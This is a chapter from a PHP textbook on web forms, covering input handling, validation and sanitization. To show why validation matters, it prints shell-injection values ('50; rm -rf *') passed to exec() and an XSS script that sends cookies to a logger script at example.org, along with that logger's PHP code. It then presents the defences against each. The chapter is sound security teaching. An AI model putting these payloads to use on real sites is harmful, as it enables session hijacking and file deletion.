© Frank M. Kromann 2018
Frank M. Kromann, Beginning PHP and MySQL, https://doi.org/10.1007/978-1-4302-6044-8_13

13. Forms

Frank M. Kromann, Aliso Viejo, CA, USA
 
You can toss around technical terms such as relational database, web services, session handling, and LDAP, but when it comes down to it, you started learning PHP because you wanted to build cool, interactive websites. After all, one of the Web’s most alluring aspects is that it’s two-way media; the Web not only enables you to publish information but also offers an effective means for obtaining input from peers, clients, and friends. This chapter introduces one of the most common ways in which you can use PHP to interact with the user: web forms. In total, I’ll show you how to use PHP and web forms to carry out the following tasks:
  • Pass data from a form to a PHP script

  • Validate form data

  • Work with multivalued form components

Before jumping into any examples, let’s begin with an introduction to how PHP is able to accept and process data submitted through a web form.

PHP and Web Forms

What makes the Web so interesting and useful is its ability to disseminate information as well as collect it, the latter of which is accomplished primarily through an HTML-based form. These forms are used to encourage site feedback, facilitate forum conversations, collect mailing and billing addresses for online orders, and much more. But coding the HTML form is only part of what’s required to effectively accept user input; a server-side component must be ready to process the input. Using PHP for this purpose is the subject of this section.

Because you’ve used forms hundreds if not thousands of times, this chapter won’t introduce form syntax. If you require a primer or a refresher course on how to create basic forms, consider reviewing any of the many tutorials available on the Web.

Instead, this chapter reviews how you can use web forms in conjunction with PHP to gather and process user data.

The first thing to think about when sending data to and from a web server is security. HTTP, the protocol used by browsers, is a plain-text protocol, which makes it possible for any system between the server and the browser to read along and possibly modify the content. Especially if you are creating a form to gather credit card information or other sensitive data, you should use a more secure means of communication. It is relatively easy to add an SSL/TLS certificate to the server, and it can be done at no cost by using a service such as Let’s Encrypt ( https://letsencrypt.org ). When the server has a certificate installed, communication takes place over HTTPS: the server sends its certificate, which contains a public key, to the browser, and the two sides use it to verify the server’s identity and to agree on session keys that encrypt the traffic in both directions. Only the server holds the matching private key.

There are two common methods for passing data from one script to another: GET and POST. Although GET is the default, you’ll typically want to use POST because it’s capable of handling considerably more data, an important characteristic when you’re using forms to insert and modify large blocks of text. If you use POST, any posted data sent to a PHP script must be referenced using the $_POST syntax introduced in Chapter 3. For example, suppose the form contains a text-field value named email that looks like this:
<input type="text" id="email" name="email" size="20" maxlength="40">
Once this form is submitted, you can reference that text-field value like so:
$_POST['email']
Of course, for the sake of convenience, nothing prevents you from first assigning this value to another variable, like so:
$email = $_POST['email'];

Keep in mind that other than the odd syntax, $_POST variables are just like any other variable that can be accessed and modified by the PHP script. They’re simply referenced in this fashion in an effort to definitively compartmentalize an external variable’s origination. As you learned in Chapter 3, such a convention is available for variables originating from the GET method, cookies, sessions, the server, and uploaded files.
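As a minimal sketch of reading a posted field defensively, the following uses the null coalescing operator (PHP 7 and later) to supply a default when the field is absent. The helper name post_value() is hypothetical and not part of PHP or of this chapter's examples.

```php
<?php
// Hypothetical helper: fetch one scalar value from a POST-style array.
function post_value(array $post, string $key, string $default = ''): string
{
    $value = $post[$key] ?? $default;
    // Array-valued fields (e.g. name="email[]") are rejected here.
    return is_string($value) ? trim($value) : $default;
}

// Yields '' when the form has not been submitted yet.
$email = post_value($_POST, 'email');
```

Passing the array in as a parameter, rather than reading $_POST inside the function, keeps the helper easy to exercise without a real form submission.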

Let’s take a look at a simple example demonstrating PHP’s ability to accept and process form data.

A Simple Example

The following script renders a form that prompts the user for his name and e-mail address. Once completed and submitted, the script (named subscribe.php) displays this information back to the browser window.
<?php
    // If the name field is filled in
    if (isset($_POST['name']))
    {
       $name = $_POST['name'];
       $email = $_POST['email'];
       printf("Hi %s! <br>", $name);
       printf("The address %s will soon be a spam-magnet! <br>", $email);
    }
?>
<form action="subscribe.php" method="post">
    <p>
        Name:<br>
        <input type="text" id="name" name="name" size="20" maxlength="40">
    </p>
    <p>
        Email Address:<br>
        <input type="text" id="email" name="email" size="20" maxlength="40">
    </p>
    <input type="submit" id="submit" name = "submit" value="Go!">
</form>
Assuming that the user completes both fields and clicks the Go! button, output similar to the following will be displayed:
Hi Bill!
The address bill@example.com will soon be a spam-magnet!

In this example, the form refers to the script in which it is found, rather than another script. Although both practices are regularly employed, it’s quite commonplace to refer to the originating document and use conditional logic to determine which actions should be performed. In this case, the conditional logic dictates that the printf() statements will only execute if the user has submitted (posted) the form.

In cases where you’re posting data back to the same script from which it originated, as in the preceding example, you can use the PHP superglobal variable $_SERVER['PHP_SELF']. The name of the executing script is automatically assigned to this variable; therefore, using it in place of the actual file name will save some additional code modification should the file name later change. Because the value is derived from the requested URL, it should be escaped with htmlspecialchars() before being written into the page. For example, the <form> tag in the preceding example could be modified as follows and still produce the same outcome:
<form action="<?php echo htmlspecialchars($_SERVER['PHP_SELF']); ?>" method="post">

HTML used to be limited to a few basic input types, but with the introduction of HTML5 a few years back, this was changed as support for color, date, datetime-local, email, month, number, range, search, tel, time, url, and week was added. These are all options that can be used with the type attribute on the input tag. They will use specific browser logic that allows for localization and validation.

Just because browsers now support some input validation does not mean you can skip that part in the PHP script that is used to receive the input. There is no guarantee that the client is a browser. It is best practice to never trust the input that is coming into a PHP script.
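To make the "never trust the input" advice concrete, here is a hedged sketch of how the subscribe.php logic shown earlier might validate and escape its input on the server. The function name subscribe_response() and its messages are assumptions made for illustration; filter_var() and FILTER_VALIDATE_EMAIL are covered later in this chapter.

```php
<?php
// Hypothetical helper: validate the subscribe form and build the response text.
function subscribe_response(array $post): string
{
    $name = $post['name'] ?? '';
    $name = is_string($name) ? trim($name) : '';
    // filter_var() returns false for anything that is not a valid address.
    $email = filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL);

    if ($name === '' || $email === false) {
        return 'Please provide a name and a valid e-mail address.';
    }
    // Escape everything the client sent before it reaches the page.
    return sprintf(
        'Hi %s! The address %s is now subscribed.',
        htmlspecialchars($name, ENT_QUOTES, 'UTF-8'),
        htmlspecialchars($email, ENT_QUOTES, 'UTF-8')
    );
}
```

The same checks run whether the request came from a browser with HTML5 validation or from a hand-written HTTP client.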

Validating Form Data

In a perfect world, the preceding example would be perfectly sufficient for accepting and processing form data. The reality is that websites are under constant attack by malicious third parties from around the globe, poking and prodding the external interfaces for ways to gain access to, steal, or even destroy the website and its accompanying data. As a result, you need to take great care to thoroughly validate all user input to ensure not only that it’s provided in the desired format (for instance, if you expect the user to provide an e-mail address, then the address should be syntactically valid), but also that it is incapable of doing any harm to the website or underlying operating system.

This section shows you just how significant this danger is by demonstrating two common attacks experienced by websites whose developers have chosen to ignore this necessary safeguard. The first attack results in the deletion of valuable site files, and the second attack results in the hijacking of a random user’s identity through an attack technique known as cross-site scripting . This section concludes with an introduction to a few easy data validation solutions that will help remedy this situation.

File Deletion

To illustrate just how ugly things could get if you neglect validation of user input, suppose that your application requires that user input be passed to some sort of legacy command-line application called inventory_manager. Executing such an application by way of PHP requires use of a command execution function such as exec() or system() (both functions were introduced in Chapter 10). The inventory_manager application accepts as input the SKU of a particular product and a recommendation for the number of products that should be reordered. For example, suppose the cherry cheesecake has been particularly popular lately, resulting in a rapid depletion of cherries. The pastry chef might use the application to order 50 more jars of cherries (SKU 50XCH67YU), resulting in the following call to inventory_manager:
$sku = "50XCH67YU";
$inventory = "50";
exec("/usr/bin/inventory_manager ".$sku." ".$inventory);
Now suppose the pastry chef has become deranged from an overabundance of oven fumes and attempts to destroy the website by passing the following string in as the recommended quantity to reorder:
50; rm -rf *
This results in the following command being executed in exec() :
exec("/usr/bin/inventory_manager 50XCH67YU 50; rm -rf *");

The inventory_manager application would indeed execute as intended but would be immediately followed by an attempt to recursively delete every file residing in the directory where the executing PHP script resides.

Cross-Site Scripting

The previous scenario demonstrates just how easily valuable site files could be deleted should user data not be filtered. Damage from such an attack might be minimized by restoring a recent backup of the site and its data, but it is much better to prevent the attack from happening in the first place.

There’s another type of attack that is considerably more difficult to recover from—because it involves the betrayal of users who have placed trust in the security of your website. Known as cross-site scripting, this attack involves the insertion of malicious code into a page frequented by other users (e.g., an online bulletin board). Merely visiting this page can result in the transmission of data to a third-party’s site, which could allow the attacker to later return and impersonate the unwitting visitor. To demonstrate the severity of this situation, let’s configure an environment that welcomes such an attack.

Suppose that an online clothing retailer offers registered customers the opportunity to discuss the latest fashion trends in an electronic forum. In the company’s haste to bring the custom-built forum online, it decided to skip sanitization of user input, figuring it could take care of such matters at a later point in time. Because HTTP is a stateless protocol, it’s common to store values in the browser (as cookies) and use that data when the user interacts with the site. It is also common to store most of the data on the server side and keep only a key as a cookie in the browser. This key is commonly referred to as a session ID. If an attacker can gain access to the session IDs of other users, the attacker can impersonate those users.

One unscrupulous customer attempts to retrieve the session keys (stored in cookies) of other customers in order to subsequently enter their accounts. Believe it or not, this is done with just a bit of HTML and JavaScript that can forward all forum visitors’ cookie data to a script residing on a third-party server. To see just how easy it is to retrieve cookie data, navigate to a popular website such as Yahoo! or Google and enter the following into the browser JavaScript console (part of the browser’s developer tools):
javascript:void(alert(document.cookie))
You should see all of your cookie information for that site posted to a JavaScript alert window similar to that shown in Figure 13-1.
Figure 13-1. Displaying cookie information from a visit to https://www.google.com

Using JavaScript, the attacker can take advantage of unchecked input by embedding a similar command into a web page and quietly redirecting the information to some script capable of storing it in a text file or a database. The attacker then uses the forum’s comment-posting tool to add the following string to the forum page:
<script>
 document.location = 'http://www.example.org/logger.php?cookie=' +
                      document.cookie
</script>
The logger.php file might look like this:
<?php
    // Assign GET variable
    $cookie = $_GET['cookie'];
    // Format variable in easily accessible manner
    $info = "$cookie\n";
    // Write information to file
    $fh = @fopen("/home/cookies.txt", "a");
    @fwrite($fh, $info);
    // Return to original site
    header("Location: http://www.example.com");
?>

If the e-commerce site isn’t comparing cookie information to a specific IP address (a safeguard that would likely be uncommon on a site that has decided to ignore data sanitization), all the attacker has to do is assemble the cookie data into a format supported by the browser, and then return to the site from which the information was culled. Chances are the attacker is now masquerading as the innocent user, potentially making unauthorized purchases, defacing the forums, and wreaking other havoc.

Modern browsers support both session (in-memory) cookies and HttpOnly cookies. A cookie flagged HttpOnly is not exposed to scripts through document.cookie, which makes it more difficult for an attacker to read its value from injected JavaScript. Setting the session cookie to HttpOnly is done by adding session.cookie_httponly = 1 to the php.ini file.
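When editing php.ini is not an option, the same flag can be set from code. The following is a sketch only, assuming PHP 7.3 or later (the array form of session_set_cookie_params() was added in that version); the secure and samesite settings go beyond what the text discusses and are included here as assumptions about a typical HTTPS deployment.

```php
<?php
// Must be called before session_start().
session_set_cookie_params([
    'httponly' => true,   // hide the cookie from document.cookie
    'secure'   => true,   // assumption: the site is served over HTTPS
    'samesite' => 'Lax',  // assumption: limit cross-site sending of the cookie
]);

// Read the settings back to confirm what session_start() will use.
$params = session_get_cookie_params();
```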

Sanitizing User Input

Given the frightening effects that unchecked user input can have on a website and its users, one would think that carrying out the necessary safeguards must be a particularly complex task. After all, the problem is so prevalent within web applications of all types that prevention must be quite difficult, right? Ironically, preventing these types of attacks is usually straightforward, accomplished by first passing the input through one of several functions before performing any subsequent task with it. It is important to consider what you do with input provided by a user. If it is passed on as part of a database query, you should ensure that the content is treated as text or numbers and not as a database command. If it is handed back to the same user or to different users, you should make sure that no JavaScript is included with the content, as this could be executed by the browser.

Four standard functions are available for doing so: escapeshellarg() , escapeshellcmd() , htmlentities() , and strip_tags() . You also have access to the native Filter extension, which offers a wide variety of validation and sanitization filters. The remainder of this section is devoted to an overview of these sanitization features.

Note

Keep in mind that the safeguards described in this section (and throughout the chapter), while effective in many situations, offer only a few of the many possible solutions at your disposal. Therefore, although you should pay close attention to what’s discussed in this chapter, you should also be sure to read as many other security-minded resources as possible to obtain a comprehensive understanding of the topic.

Websites are built with two distinct components: the server side that generates output and handles input from the user and the client side that renders HTML and other content as well as JavaScript code provided by the server. This two-tier model is the root of the security challenges. Even if all the client side code is provided by the server, there is no way to ensure that it is executed or that it is not tampered with. A user might not use a browser to interact with the server. For this reason, it is recommended to never trust any input from a client, even if you spend the time to create nice validation functions in JavaScript to make a better experience for the user that follows all your rules.

Escaping Shell Arguments

The escapeshellarg() function delimits its arguments with single quotes and escapes quotes. Its prototype follows:
string escapeshellarg(string arguments)
The effect is such that when arguments is passed to a shell command, it will be considered a single argument. This is significant because it lessens the possibility that an attacker could masquerade additional commands as shell command arguments. Therefore, in the previously described file-deletion scenario, all of the user input would be enclosed in single quotes, like so:
/usr/bin/inventory_manager '50XCH67YU' '50; rm -rf *'

Attempting to execute this would mean 50; rm -rf * would be treated by inventory_manager as the requested inventory count. Presuming inventory_manager is validating this value to ensure that it’s an integer, the call will fail and no harm will be done.
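A short sketch of the quoting described above follows. The helper name build_inventory_command() is hypothetical, and the quoted output in the comment is what a Unix-like system produces (Windows quoting differs). The command is only assembled here, never executed.

```php
<?php
// Hypothetical helper: assemble the inventory_manager command line.
function build_inventory_command(string $sku, string $inventory): string
{
    // Each value becomes exactly one shell argument.
    return '/usr/bin/inventory_manager '
        . escapeshellarg($sku) . ' '
        . escapeshellarg($inventory);
}

$command = build_inventory_command('50XCH67YU', '50; rm -rf *');
// On Unix-like systems:
// /usr/bin/inventory_manager '50XCH67YU' '50; rm -rf *'
```

Quoting stops the injection, but the quantity is still not a number, so validating it before building the command remains worthwhile.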

Escaping Shell Metacharacters

The escapeshellcmd() function operates under the same premise as escapeshellarg() , but it sanitizes potentially dangerous input program names rather than program arguments. Its prototype follows:
string escapeshellcmd(string command)

This function operates by escaping any shell metacharacters found in the command. These metacharacters include # & ; ` | * ? ~ < > ^ ( ) [ ] { } $ \ as well as the characters \x0A and \xFF. Single and double quotes are escaped only when they are unpaired.

You should use escapeshellcmd() in any case where the user’s input might determine the name of a command to execute. For instance, suppose the inventory-management application is modified to allow the user to call one of two available programs, foodinventory_manager or supplyinventory_manager , by passing along the string food or supply , respectively, together with the SKU and requested amount. The exec() command might look like this:
exec("/usr/bin/".$command."inventory_manager ".$sku." ".$inventory);
Assuming the user plays by the rules, the task will work just fine. However, consider what would happen if the user were to pass along the following as the value to $command :
blah; rm -rf *;
The string handed to exec() would then read as follows:
/usr/bin/blah; rm -rf *; inventory_manager 50XCH67YU 50
This assumes the user also passes in 50XCH67YU and 50 as the SKU and inventory number, respectively. These values don’t matter anyway because the appropriate inventory_manager command will never be invoked since a bogus command was passed in to execute the nefarious rm command. However, if this material were to be filtered through escapeshellcmd() first, $command would look like this:
blah\; rm -rf \*\;

This means exec() would attempt to run a program named /usr/bin/blah; (semicolon included), with rm, -rf, and the rest of the line passed to it as ordinary arguments. No such program exists, so the call fails and nothing is deleted.
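The escaping can be checked directly, and where the set of permitted programs is known in advance, an allow-list is a common complement to escaping. This is a sketch under those assumptions: inventory_program() is a hypothetical helper, and the backslash-escaped result applies to Unix-like systems.

```php
<?php
// Escaping neutralizes the shell metacharacters in the malicious value.
$escaped = escapeshellcmd('blah; rm -rf *;');

// Hypothetical allow-list: only these two prefixes map to real programs.
function inventory_program(string $type): ?string
{
    $allowed = ['food', 'supply'];
    return in_array($type, $allowed, true)
        ? '/usr/bin/' . $type . 'inventory_manager'
        : null; // anything else is refused outright
}
```

With the allow-list, a value such as blah; rm -rf *; never reaches the shell at all.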

Converting Input into HTML Entities

The htmlentities() function converts certain characters having special meaning in an HTML context to strings that a browser can render rather than execute them as HTML. Its prototype follows:
string htmlentities(string input [, int quote_style [, string charset]])
Five characters are considered special by this function:
  • & will be translated to &amp;

  • " will be translated to &quot; (unless quote_style is set to ENT_NOQUOTES)

  • > will be translated to &gt;

  • < will be translated to &lt;

  • ' will be translated to &#039; (when quote_style is set to ENT_QUOTES)

Returning to the cross-site scripting example, if the user’s input is first passed through htmlentities() rather than directly embedded into the page and executed as JavaScript, the input would be displayed exactly as it is input because it would be translated like so:
&lt;script&gt;
document.location ='http://www.example.org/logger.php?cookie=' +
                    document.cookie
&lt;/script&gt;
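The translation can be sketched in a few lines. The sample comment string is made up for illustration; passing the flags and character set explicitly avoids relying on defaults, which have changed between PHP versions.

```php
<?php
// Hypothetical forum comment containing a script tag.
$comment = '<script>alert("x")</script>';

// ENT_QUOTES converts both single and double quotes.
$safe = htmlentities($comment, ENT_QUOTES, 'UTF-8');
// $safe is now &lt;script&gt;alert(&quot;x&quot;)&lt;/script&gt;
```

The browser displays the original text of the comment but no longer treats it as markup.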

Stripping Tags from User Input

Sometimes it is best to completely strip user input of all HTML input, regardless of intent. For instance, HTML-based input can be particularly problematic when the information is displayed back to the browser, as in the case of a message board. The introduction of HTML tags into a message board could alter the display of the page, causing it to be displayed incorrectly or not at all, and if the tags contain JavaScript it could be executed by the browser. This problem can be eliminated by passing the user input through strip_tags() , which removes all tags from a string (a tag is defined as anything that starts with the character < and ends with >). Its prototype follows:
string strip_tags(string str [, string allowed_tags])
The input parameter str is the string that will be examined for tags, while the optional input parameter allowed_tags specifies any tags that you would like to be allowed in the string. For example, italic tags (<i></i>) might be allowable, but table tags such as <td></td> could potentially wreak havoc on a page. Please note that an allowed tag keeps its attributes, and many attributes (onclick, onmouseover, and the like) can carry JavaScript code. That code will not be removed if the tag is allowed. An example follows:
<?php
    $input = "I <td>really</td> love <i>PHP</i>!";
    // Listing the opening tag is enough to allow both <i> and </i>
    $input = strip_tags($input, "<i>");
    // $input now equals "I really love <i>PHP</i>!"
?>
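The caveat about allowed tags is easy to overlook, so here is a small sketch of it. The input string and the steal() function name inside it are invented for the example.

```php
<?php
// An allowed tag carrying an event-handler attribute, plus a disallowed tag.
$input = '<i onmouseover="steal()">PHP</i> <td>rocks</td>';

$clean = strip_tags($input, '<i>');
// The <td> tags are gone, but the <i> tag keeps its onmouseover attribute.
```

For this reason, allowing tags through strip_tags() is best reserved for input that is otherwise trusted; escaping with htmlentities() is the safer default for anything echoed back to other users.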

Validating and Sanitizing Data with the Filter Extension

Because data validation is such a commonplace task, the PHP development team added native validation features to the language in version 5.2. Known as the Filter extension, these features can be used not only to validate data such as an e-mail address so it meets stringent requirements, but also to sanitize data, altering it to fit specific criteria without requiring the user to take further action.

To validate data using the Filter extension, you’ll choose from one of many available validation and sanitization filters ( http://php.net/manual/en/filter.filters.php ), including an option that allows you to write your own filter function, and pass the filter type and target data to the filter_var() function. For instance, to validate an e-mail address you’ll pass the FILTER_VALIDATE_EMAIL filter as demonstrated here:
$email = "john@@example.com";
if (! filter_var($email, FILTER_VALIDATE_EMAIL))
{
    echo "INVALID E-MAIL!";
}
The FILTER_VALIDATE_EMAIL identifier is just one of many validation filters currently available. The currently supported validation filters are summarized in Table 13-1.
Table 13-1. The Filter Extension’s Validation Capabilities

Target Data               Identifier
Boolean values            FILTER_VALIDATE_BOOLEAN
E-mail addresses          FILTER_VALIDATE_EMAIL
Floating-point numbers    FILTER_VALIDATE_FLOAT
Integers                  FILTER_VALIDATE_INT
IP addresses              FILTER_VALIDATE_IP
MAC addresses             FILTER_VALIDATE_MAC
Regular expressions       FILTER_VALIDATE_REGEXP
URLs                      FILTER_VALIDATE_URL

You can further tweak the behavior of these eight validation filters by passing flags into the filter_var() function. For instance, you can require that only IPv4 or only IPv6 addresses be accepted by passing in the FILTER_FLAG_IPV4 or FILTER_FLAG_IPV6 flag, respectively:
$ipAddress = "192.168.1.01";
if (!filter_var($ipAddress, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6))
{
    echo "Please provide an IPV6 address!";
}

Consult the PHP documentation for a complete list of available flags.
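Besides flags, filter_var() accepts an options array. As a sketch, the following applies FILTER_VALIDATE_INT with a range to the reorder quantity from the earlier inventory example; the helper name valid_quantity() and the 1 to 1000 range are assumptions chosen for illustration.

```php
<?php
// Hypothetical helper: accept a reorder quantity only within a sane range.
function valid_quantity($raw): ?int
{
    $qty = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => 1000],
    ]);
    // filter_var() returns false on failure; map that to null.
    return $qty === false ? null : $qty;
}

$ok  = valid_quantity('50');            // accepted, converted to an integer
$bad = valid_quantity('50; rm -rf *');  // rejected
```

Note that a successful validation also converts the string to a real integer, so the value can be used safely from that point on.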

Sanitizing Data with the Filter Extension

As I mentioned, it’s also possible to use the Filter extension to sanitize data, which can be useful when processing user input intended to be posted in a forum or blog comments. For instance, to remove all tags from a string, you can use the FILTER_SANITIZE_STRING filter (note that this filter is deprecated as of PHP 8.1, where strip_tags() or htmlspecialchars() is the usual substitute):
$userInput = "Love the site. E-mail me at <a href='http://www.example.com'>Spammer</a>.";
$sanitizedInput = filter_var($userInput, FILTER_SANITIZE_STRING);
// $sanitizedInput = Love the site. E-mail me at Spammer.
A total of 10 sanitization filters are currently supported, summarized in Table 13-2.
Table 13-2. The Filter Extension’s Sanitization Capabilities

Identifier                       Purpose
FILTER_SANITIZE_EMAIL            Removes all characters from a string except those allowable within an e-mail address as defined within RFC 822 ( https://www.w3.org/Protocols/rfc822/ ).
FILTER_SANITIZE_ENCODED          URL encodes a string, producing output identical to that returned by the urlencode() function.
FILTER_SANITIZE_MAGIC_QUOTES     Escapes potentially dangerous characters with a backslash using the addslashes() function.
FILTER_SANITIZE_NUMBER_FLOAT     Removes any characters that would result in a floating-point value not recognized by PHP.
FILTER_SANITIZE_NUMBER_INT       Removes any characters that would result in an integer value not recognized by PHP.
FILTER_SANITIZE_SPECIAL_CHARS    HTML encodes the ', ", <, >, and & characters, in addition to any character having an ASCII value less than 32 (this includes characters such as a tab and backspace).
FILTER_SANITIZE_STRING           Strips all tags such as <p> and <b>.
FILTER_SANITIZE_STRIPPED         An alias of the “string” filter.
FILTER_SANITIZE_URL              Removes all characters from a string except for those allowable within a URL as defined within RFC 3986 ( https://tools.ietf.org/html/rfc3986 ).
FILTER_UNSAFE_RAW                Used in conjunction with various optional flags, FILTER_UNSAFE_RAW can strip and encode characters in a variety of ways.

As it does with the validation features, the Filter extension also supports a variety of flags that can be used to tweak the behavior of many sanitization identifiers. Consult the PHP documentation for a complete list of supported flags.
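A brief sketch of three of these sanitization filters in use follows. The input strings are invented for the example; the point is that sanitizing removes or encodes characters but does not by itself prove the result is valid, so a validation pass afterward is still a reasonable step.

```php
<?php
// Characters not allowed in an e-mail address are dropped.
$email = filter_var('john(.doe)@exa//mple.com', FILTER_SANITIZE_EMAIL);

// Everything except digits and the + and - signs is dropped.
$count = filter_var('1,234 units', FILTER_SANITIZE_NUMBER_INT);

// Markup characters are HTML encoded rather than removed.
$text = filter_var('<b>Hi</b> & bye', FILTER_SANITIZE_SPECIAL_CHARS);

// Sanitized output can then be validated as usual.
$isValid = filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
```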

Working with Multivalued Form Components

Multivalued form components such as check boxes and multiple-select boxes greatly enhance your web-based data-collection capabilities because they enable the user to simultaneously select multiple values for a given form item. For example, consider a form used to gauge a user’s computer-related interests. Specifically, you would like to ask the user to indicate those programming languages that interest him. Using a few text fields along with a multiple-select box, this form might look similar to that shown in Figure 13-2.
Figure 13-2. Creating a multiselect box

The HTML for the multiple-select box shown in Figure 13-2 might look like this:
<select name="languages[]" multiple="multiple">
    <option value="csharp">C#</option>
    <option value="javascript">JavaScript</option>
    <option value="perl">Perl</option>
    <option value="php" selected>PHP</option>
</select>
Because these components are multivalued, the form processor must be able to recognize that there may be several values assigned to a single form variable. In the preceding select box and in the check boxes of the example that follows, note that both use the name languages to reference several language entries. How does PHP handle the matter? Perhaps not surprisingly, by considering it an array. To make PHP recognize that several values may be assigned to a single form variable, you need to make a minor change to the form item name, appending a pair of square brackets to it. Therefore, instead of languages, the name would read languages[]. Once renamed, PHP will treat the posted variable just like any other array. Consider this example:
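<?php
    if (isset($_POST['submit']))
    {
        echo "You like the following languages:<br>";
        // The key is absent when no box is checked, so test for it first
        if (isset($_POST['languages']) && is_array($_POST['languages'])) {
            foreach ($_POST['languages'] as $language) {
                // Escape each value before echoing it back to the browser
                $language = htmlentities($language);
                echo "$language<br>";
            }
        }
    }
?>
<form action="<?php echo htmlspecialchars($_SERVER['PHP_SELF']); ?>" method="post">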
   What's your favorite programming language?<br> (check all that apply):<br>
   <input type="checkbox" name="languages[]" value="csharp">C#<br>
   <input type="checkbox" name="languages[]" value="javascript">JavaScript<br>
   <input type="checkbox" name="languages[]" value="perl">Perl<br>
   <input type="checkbox" name="languages[]" value="php">PHP<br>
   <input type="submit" name="submit" value="Submit!">
</form>
If the user chooses the languages C# and PHP, they are greeted with the following output:
You like the following languages:
csharp
php
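Since a client can submit values the form never offered, it can help to compare the posted array against the known options. The following is a sketch only; the helper name selected_languages() is hypothetical, and the list of offered values simply mirrors the check boxes above.

```php
<?php
// Hypothetical helper: keep only the submitted values the form actually offered.
function selected_languages(array $post): array
{
    $offered = ['csharp', 'javascript', 'perl', 'php'];
    $chosen  = $post['languages'] ?? [];
    if (!is_array($chosen)) {
        return []; // a scalar was sent where an array was expected
    }
    // Discard nested arrays and other non-string entries.
    $chosen = array_filter($chosen, 'is_string');
    // Result follows the order of $offered, reindexed from zero.
    return array_values(array_intersect($offered, $chosen));
}
```

Called with $_POST, the function returns an array that is safe to loop over even when no box was checked or when unexpected values were sent.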

Summary

One of the Web’s great strengths is the ease with which it enables us to not only disseminate but also compile and aggregate user information. However, as developers, this means that we must spend an enormous amount of time building and maintaining a multitude of user interfaces, many of which are complex HTML forms. The concepts described in this chapter should enable you to decrease that time a tad.

In addition, this chapter offered a few commonplace strategies for improving your application’s general user experience. Although not an exhaustive list, perhaps the material presented in this chapter will act as a springboard for you to conduct further experimentation while decreasing the time that you invest in what is surely one of the more time-consuming aspects of web development: improving the user experience.

The next chapter shows you how to protect the sensitive areas of your website by forcing users to supply a username and password prior to entry.
